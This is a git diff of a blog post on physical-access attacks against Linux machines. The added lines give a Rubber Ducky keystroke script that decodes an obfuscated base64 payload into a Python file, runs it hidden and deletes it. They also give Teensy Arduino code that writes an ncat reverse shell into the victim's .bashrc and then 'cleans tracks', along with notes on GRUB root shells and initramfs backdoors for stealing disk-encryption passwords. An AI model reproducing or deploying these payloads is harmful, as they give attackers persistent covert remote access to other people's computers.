diff --git a/_posts/2017-11-8-FrenchCroissant.md b/_posts/2017-11-8-FrenchCroissant.md index d5c543e..da480cc 100644 --- a/_posts/2017-11-8-FrenchCroissant.md +++ b/_posts/2017-11-8-FrenchCroissant.md @@ -38,7 +38,7 @@ Most of the times you can acces the debug application on the port 80 on the inte ## USB Live ISO When there is no bios password, it's easy to compromise the computer by booting with a Live USB / Live CD and adding the backdoor. -## Grub - root access +## Grub - Root access Even if there is a bios password you still need to secure your Grub (boot-manager), otherwise anyone can edit it in order to start a root shell. {% highlight bash%} @@ -47,8 +47,80 @@ Press [E] to edit the command line Append init=/bin/sh {% endhighlight %} +## USB : Rubber Ducky or Teensy +If you are willing to spend around 40$, you can buy a Rubber Ducky. This is a fake USB which will act as a keyboard and send any key to the plugged computer. The payload can be created within a notepad or online at https://ducktoolkit.com/. + +The full documentation is available at [https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript) + +The following script was generated by DuckToolkit and serve a directory via HTTP +{% highlight bash%} +DEFAULT_DELAY 100 +DELAY 3000 +CTRL-ALT t +DELAY 200 +STRING printf '\e[3;1;1t' +ENTER +STRING echo H4sIACBLCFoC/13OzwqDMAwG8HufIiDM9jAfYLD7joLei2hmC/1HGgXffh2dHpbTx0f4JdanSAwxC1tTPq7oN8c2UZwxZxtWIRZ8Qzq0YU5SPQSUibmbzWJJtq06i0Iwetmmg00McPcwFNHhaxz7AWlHAriVddEUUBskrDRtQU/OnfTf+a6vUfJEK/Lz94jqcilY1uvN16jipX0AB59ZiuMAAAA= | base64 --decode | gzip -d > environ-34314.py +ENTER +STRING nohup python environ-34314.py > /dev/null 2>&1 & +ENTER +STRING rm -rf environ-34314.py +ENTER +STRING exit +ENTER +{% endhighlight %} + + +Alternatively you can buy a Teensy board for 15$, it requires a little bit of configuration but it works as well +First, you need to install the arduino IDE, the Teensyduino and the rules for the Teensy board. +{% highlight bash%} +wget https://raw.githubusercontent.com/apmorton/teensy-template/master/tools/49-teensy.rules +mv 49-teensy.rules /etc/udev/rules.d/49-teensy.rules +wget https://www.pjrc.com/teensy/td_140/TeensyduinoInstall.linux64 && chmod +x ./TeensyduinoInstall.linux64 &&./TeensyduinoInstall.linux64 +wget https://www.arduino.cc/download_handler.php +tar xvf arduino-1.8.5-linux64.tar.xz +{% endhighlight %} + +The following code press the keys [ALT]+[F2], then write "xterm", followed by an echo into the user's .bashrc +{% highlight c%} +void setup() { + + delay(100); + Keyboard.set_modifier(MODIFIERKEY_ALT); + Keyboard.set_key1(KEY_F2); + Keyboard.send_now(); + delay(100); + + Keyboard.set_modifier(0); + Keyboard.set_key1(0); + Keyboard.send_now(); + delay(100); + + Keyboard.println("xterm"); + delay(100); + + Keyboard.set_key1(KEY_ENTER); + Keyboard.send_now(); + delay(100); + + // Reverse-shell stored in the bashrc + Keyboard.println(" echo ' ncat 192.168.1.XX 4242 -e /bin/bash 2>/dev/null & clear' >> $HOME/.bashrc "); + delay(100); + + // Now we clean our tracks + Keyboard.println("exit"); + delay(100); +} + +void loop() { + delay(5000); +} +{% endhighlight %} +NOTE: When programming the board press the "RESET" button to avoid the launch of the payload on your computer + +## Initramfs Backdoor - Encrypted Hard Drive +When you're booting there is one partition that is not encrypted in order to start. It will ask for your password and then decrypt and mount the other partition. If you have and access to the hard drive it is possible to replace the Initramfs.img in order to get the password to decrypt the full hdd, you can also wait for the decryption and then inject what you want inside a file as root :) -## Encrypted Hard Drive Mounting boot partition (not encrypted) {% highlight bash%} fdisk -l /dev/sda